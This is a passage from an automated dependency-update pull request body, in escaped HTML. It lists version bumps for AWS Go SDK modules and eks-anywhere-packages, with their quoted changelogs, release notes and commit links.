href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.21\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-04-10)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/connect/CHANGELOG.md#v1510-2023-04-10\"\u003ev1.51.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds the ability to configure an agent's routing profile to receive contacts from multiple channels at the same time via extending the UpdateRoutingProfileConcurrency, CreateRoutingProfile and DescribeRoutingProfile APIs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/ecs/CHANGELOG.md#v1250-2023-04-10\"\u003ev1.25.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for enabling FIPS compliance on Amazon ECS Fargate tasks\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/marketplacecatalog\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/marketplacecatalog/CHANGELOG.md#v1160-2023-04-10\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Added three new APIs to support resource sharing: GetResourcePolicy, PutResourcePolicy, and DeleteResourcePolicy. Added new OwnershipType field to ListEntities request to let users filter on entities that are shared with them. Increased max page size of ListEntities response from 20 to 50 results.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/mediaconvert\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/mediaconvert/CHANGELOG.md#v1350-2023-04-10\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Elemental MediaConvert SDK now supports conversion of 608 paint-on captions to pop-on captions for SCC sources.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/omics\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/omics/CHANGELOG.md#v130-2023-04-10\"\u003ev1.3.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Remove unexpected API changes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/rekognition/CHANGELOG.md#v1240-2023-04-10\"\u003ev1.24.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for Face Liveness APIs in Amazon Rekognition. Updates UpdateStreamProcessor to return ResourceInUseException Exception. Minor updates to API documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-04-07)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/dlm\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/dlm/CHANGELOG.md#v1150-2023-04-07\"\u003ev1.15.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAnnouncement\u003c/strong\u003e: This release includes breaking changes for the timestamp trait on the data lifecycle management client.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated timestamp format for GetLifecyclePolicy API\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Correct timestamp type for data lifecycle manager.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/docdb\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/docdb/CHANGELOG.md#v1210-2023-04-07\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new parameter 'DBClusterParameterGroupName' to 'RestoreDBClusterFromSnapshot' API to associate the name of the DB cluster parameter group while performing restore.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/fsx\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/fsx/CHANGELOG.md#v1288-2023-04-07\"\u003ev1.28.8\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Amazon FSx for Lustre now supports creating data repository associations on Persistent_1 and Scratch_2 file systems.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/lambda\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/lambda/CHANGELOG.md#v1310-2023-04-07\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new Lambda InvokeWithResponseStream API to support streaming Lambda function responses. The release also adds a new InvokeMode parameter to Function Url APIs to control whether the response will be streamed or buffered.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/quicksight/CHANGELOG.md#v1340-2023-04-07\"\u003ev1.34.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release has two changes: adding the OR condition to tag-based RLS rules in CreateDataSet and UpdateDataSet; adding RefreshSchedule and Incremental RefreshProperties operations for users to programmatically configure SPICE dataset ingestions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/redshiftdata\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/redshiftdata/CHANGELOG.md#v1193-2023-04-07\"\u003ev1.19.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Update documentation of API descriptions as needed in support of temporary credentials with IAM identity.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/servicecatalog\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/servicecatalog/CHANGELOG.md#v1181-2023-04-07\"\u003ev1.18.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Updates description for property\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-04-06)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudformation\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/cloudformation/CHANGELOG.md#v1270-2023-04-06\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Including UPDATE_COMPLETE as a failed status for DeleteStack waiter.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/greengrassv2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/greengrassv2/CHANGELOG.md#v1220-2023-04-06\"\u003ev1.22.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for SUCCEEDED value in coreDeviceExecutionStatus field. Documentation updates for Greengrass V2.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/proton\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/proton/CHANGELOG.md#v1210-2023-04-06\"\u003ev1.21.0\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fcc0f5daa41033b7a696f8cc5f53a9fc8696a274\"\u003e\u003ccode\u003efcc0f5d\u003c/code\u003e\u003c/a\u003e Release 2023-04-10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cd750e0b2188951c525ae7917d47ae9e2d013a1b\"\u003e\u003ccode\u003ecd750e0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1bc2f0514c73be727d3536e829fef18911bb45ae\"\u003e\u003ccode\u003e1bc2f05\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b964f5ca3ccae40ef8d7a56fd1b1ad040764b5fa\"\u003e\u003ccode\u003eb964f5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fd6901588c6d13a7889787328d0628134afd14cc\"\u003e\u003ccode\u003efd69015\u003c/code\u003e\u003c/a\u003e fix APIGW exports nullability exceptions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fae239abb72a392c50e05aa567b2e5cc2b93a10b\"\u003e\u003ccode\u003efae239a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2089\"\u003e#2089\u003c/a\u003e from aws/auditAccessibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/acf33a2872dbd9d3547842f38ccd38863048c121\"\u003e\u003ccode\u003eacf33a2\u003c/code\u003e\u003c/a\u003e Update aws-sdk-go-v2's comment codegened from Smithy Go's updated document sm...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/27360c189034eb456ebe7458bb8e019bc45d686c\"\u003e\u003ccode\u003e27360c1\u003c/code\u003e\u003c/a\u003e fix APIGW exports nullability exceptions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/30383d567f67c2a67b2b40a462a8c284c49d1796\"\u003e\u003ccode\u003e30383d5\u003c/code\u003e\u003c/a\u003e Release 2023-04-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/352f89c2d23ec6249a699c732ba5c9ae050f833f\"\u003e\u003ccode\u003e352f89c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.21\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.297.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/159f4d23fd3150aa3b14c231c434f46f42b72c2a\"\u003e\u003ccode\u003e159f4d2\u003c/code\u003e\u003c/a\u003e Release 2026-04-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/50223dc5168c2eb6316a108f23a7fd0803afba76\"\u003e\u003ccode\u003e50223dc\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/af25337605d0de4dc7f4141c6b1627ec31254415\"\u003e\u003ccode\u003eaf25337\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/277dc017b3b8ea944865ffb901eea3bf82121f5d\"\u003e\u003ccode\u003e277dc01\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/22bc35ca5a2af77140a47680f80873b4d61b6551\"\u003e\u003ccode\u003e22bc35c\u003c/code\u003e\u003c/a\u003e Release 2026-04-06\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9a35fedd65d0cdad42281199a7659146234893a1\"\u003e\u003ccode\u003e9a35fed\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/867b085ecb8579affb591d0e98bbe362376ce911\"\u003e\u003ccode\u003e867b085\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/61d367c87617dbe79f6cb8fe8809d09ce949d2fa\"\u003e\u003ccode\u003e61d367c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8560a07e8b7ed78b0962b6df18050500a32705e7\"\u003e\u003ccode\u003e8560a07\u003c/code\u003e\u003c/a\u003e Release 2026-04-03\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a5aafdff76b34debb6940077fc4377ed80d24805\"\u003e\u003ccode\u003ea5aafdf\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.297.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.57.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7c25c211744bdcff47a7203a7a894b1241f9da50\"\u003e\u003ccode\u003e7c25c21\u003c/code\u003e\u003c/a\u003e Release 2024-06-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b374423feaf0b04f01c7624b10915871e589b8a1\"\u003e\u003ccode\u003eb374423\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/923f54ea6016e1c70ad45ba0854e7361a72c3ba6\"\u003e\u003ccode\u003e923f54e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f3bdfcf190150f62a7a07a03bc32d9c58a68f2e\"\u003e\u003ccode\u003e5f3bdfc\u003c/code\u003e\u003c/a\u003e track changes for string_array endpoint parameters (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2699\"\u003e#2699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b4498c633741e24ff4930313610096601dc4036\"\u003e\u003ccode\u003e2b4498c\u003c/code\u003e\u003c/a\u003e Release 2024-06-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/332d372bb946f0d50cae58f9401b9c1244e4b818\"\u003e\u003ccode\u003e332d372\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9397b8d8c05eb1528910ba81881797e7c0e53d17\"\u003e\u003ccode\u003e9397b8d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/674e1e4412ce44325902125c935ce124d0bfaf4f\"\u003e\u003ccode\u003e674e1e4\u003c/code\u003e\u003c/a\u003e Release 2024-06-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/406eeb4367bab3ac49b75fbd2d842186e961f4f0\"\u003e\u003ccode\u003e406eeb4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/17bd894f3c3842d21d5963bc23213397557c3105\"\u003e\u003ccode\u003e17bd894\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/s3/v1.57.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca 